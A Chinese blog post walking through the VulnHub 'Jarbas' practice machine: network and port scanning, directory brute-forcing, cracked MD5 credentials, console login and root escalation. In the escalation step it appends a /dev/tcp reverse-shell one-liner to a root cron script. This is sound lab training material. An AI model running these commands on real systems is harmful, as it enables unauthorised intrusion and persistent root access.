Vulnhub——jarbas

韓憨憨

已于 2023-11-15 11:01:09 修改

阅读量106

点赞数 1

分类专栏： vulnhub靶场渗透测试文章标签：网络安全安全 web安全

于 2023-11-15 11:00:06 首次发布

本文链接：https://blog.csdn.net/weixin_52512479/article/details/134415396

版权

vulnhub靶场同时被 2 个专栏收录

12 篇文章 0 订阅

订阅专栏

渗透测试

12 篇文章 0 订阅

订阅专栏

Vulnhub——jarbas

信息收集

1.存活主机扫描

192.168.197.135

┌──(root㉿kali)-[~]
└─# nmap -sn 192.168.197.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-28 14:30 CST
Nmap scan report for 192.168.197.1
Host is up (0.00025s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.197.2
Host is up (0.00018s latency).
MAC Address: 00:50:56:F2:C0:58 (VMware)
Nmap scan report for 192.168.197.135
Host is up (0.000090s latency).
MAC Address: 00:0C:29:99:2A:5A (VMware)
Nmap scan report for 192.168.197.254
Host is up (0.00017s latency).
MAC Address: 00:50:56:F3:66:B1 (VMware)
Nmap scan report for 192.168.197.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 27.93 seconds

2.端口扫描

22、80、3306、8080

┌──(root㉿kali)-[~]
└─# nmap -A -p- 192.168.197.135
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-28 14:31 CST
Nmap scan report for 192.168.197.135
Host is up (0.00054s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 28:bc:49:3c:6c:43:29:57:3c:b8:85:9a:6d:3c:16:3f (RSA)
|   256 a0:1b:90:2c:da:79:eb:8f:3b:14:de:bb:3f:d2:e7:3f (ECDSA)
|_  256 57:72:08:54:b7:56:ff:c3:e6:16:6f:97:cf:ae:7f:76 (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: Jarbas - O Seu Mordomo Virtual!
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
3306/tcp open  mysql   MariaDB (unauthorized)
8080/tcp open  http    Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
MAC Address: 00:0C:29:99:2A:5A (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.54 ms 192.168.197.135

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.93 seconds

┌──(root㉿kali)-[~]
└─# nmap -sT -sV -O -p- 192.168.197.135
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-28 16:35 CST
Nmap scan report for 192.168.197.135
Host is up (0.00052s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
3306/tcp open  mysql   MariaDB (unauthorized)
8080/tcp open  http    Jetty 9.4.z-SNAPSHOT
MAC Address: 00:0C:29:99:2A:5A (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.08 seconds

3.端口漏洞扫描

未发先可利用的漏洞，8080：下存在/robots.txt 可以重点看一下

┌──(root㉿kali)-[~]
└─# nmap --script=vuln -p22,80,3306,8080 192.168.197.135
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-28 14:32 CST
Nmap scan report for 192.168.197.135
Host is up (0.00045s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-trace: TRACE is enabled
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
|_  /icons/: Potentially interesting folder w/ directory listing
3306/tcp open  mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
8080/tcp open  http-proxy
| http-enum:
|_  /robots.txt: Robots file
MAC Address: 00:0C:29:99:2A:5A (VMware)

Nmap done: 1 IP address (1 host up) scanned in 36.19 seconds

4.目录爆破

80端口目录爆破

┌──(root㉿kali)-[~]
└─# dirsearch -u 192.168.197.135 -x 403 404

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.168.197.135_23-02-28_14-34-28.txt

Error Log: /root/.dirsearch/logs/errors-23-02-28_14-34-28.log

Target: http://192.168.197.135/

[14:34:28] Starting:
[14:34:37] 200 -  359B  - /access.html
[14:34:56] 200 -   32KB - /index.html

Task Completed

发现access.html目录下存在三段编码

通过MD5解码：

tiago:5978a63b4654c73c60fa24f836386d87（italia99）

trindade：f463f63616cb3f1e81ce46b39f882fd5（marianna）

eder：9b38e2b1e8b12f426b0d208a7ab6cb98（vipsu）

8080目录爆破

┌──(root㉿kali)-[~]
└─# dirsearch -u 192.168.197.135:8080 -x 403,404

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/8080_23-02-28_14-39-30.txt

Error Log: /root/.dirsearch/logs/errors-23-02-28_14-39-30.log

Target: http://192.168.197.135:8080/

[14:39:30] Starting:
[14:39:55] 302 -    0B  - /assets  ->  http://192.168.197.135:8080/assets/
[14:39:55] 500 -   13KB - /assets/
[14:40:00] 303 -    0B  - /console/j_security_check  ->  http://192.168.197.135:8080/loginError
[14:40:05] 400 -    5KB - /error
[14:40:06] 200 -   17KB - /favicon.ico
[14:40:10] 303 -    0B  - /j_security_check  ->  http://192.168.197.135:8080/loginError
[14:40:13] 302 -    0B  - /logout  ->  http://192.168.197.135:8080/
[14:40:13] 302 -    0B  - /logout/  ->  http://192.168.197.135:8080/
[14:40:13] 200 -    6KB - /login
[14:40:25] 200 -   71B  - /robots.txt

Task Completed

渗透过程

1.后台登录

8080是一个后台登录界面

尝试使用刚才获得的三个账号密码进行登录

tiago:italia99

trindade：marianna

eder：vipsu

第三个成功登录

2.获取webshell

在新建任务中发现可以构建执行shell

kali进行监听。反弹shell尝试一下，点应用后再进行保存不然有可能会报错

在这里插入图片描述

nc：

-l 执行监听模式

-v 显示指令执行过程，输出交互式或错误信息

-p 设置本地主机使用的通信端口

-n 直接使用IP地址，而不是通过域名服务器

提权

查看存在哪些用户

其中有eder用户，之前收集到的其中有这一个用户和密码，尝试登录，发现密码是错误的

查看存在哪些权限 sudo -l ，发现需要密码，没能成功

任务计划提权

查看任务计划：

发现root权限每个五分钟执行这条.sh文件

ceontab中 /dev/null 2>&1

重定向 >

/dev/null 代表空设备文件

1.表示stdout标准输出，默认系统是1，所以“>/dev/null”等同于“1>/dev/null”

2.表示stder标准错误

执行shell命令行通常自动打开三个标准文件：

stdin：标准输入文件，通常对应终端的键盘

stdout：标准输出文件     stderr：标准错误输出文件   <这两个文件对应终端的屏幕>

&表示等同于的意思，2>&1，表示2的输出重定向等同于1

查看

bash-4.2$ cat /etc/script/CleaningScript.sh
cat /etc/script/CleaningScript.sh
#!/bin/bash

rm -rf /var/log/httpd/access_log.txt

每隔五分钟会删除这个文件

kali进行监听：

反弹shell，每五分钟输出反弹shell

echo "bash -c 'exec bash -i &>/dev/tcp/192.168.197.128/8888 <&1'" >> /etc/script/CleaningScript.sh

获取root权限

韓憨憨

关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
Vulnhub——jarbas

其中有eder用户，之前收集到的其中有这一个用户和密码，尝试登录，发现密码是错误的。未发先可利用的漏洞，8080：下存在/robots.txt 可以重点看一下。反弹shell尝试一下，点应用后再进行保存不然有可能会报错。查看存在哪些权限 sudo -l ，发现需要密码，没能成功。发现access.html目录下存在三段编码。-v 显示指令执行过程，输出交互式或错误信息。-n 直接使用IP地址，而不是通过域名服务器。发现root权限每个五分钟执行这条.sh文件。反弹shell，每五分钟输出反弹shell。
复制链接

扫一扫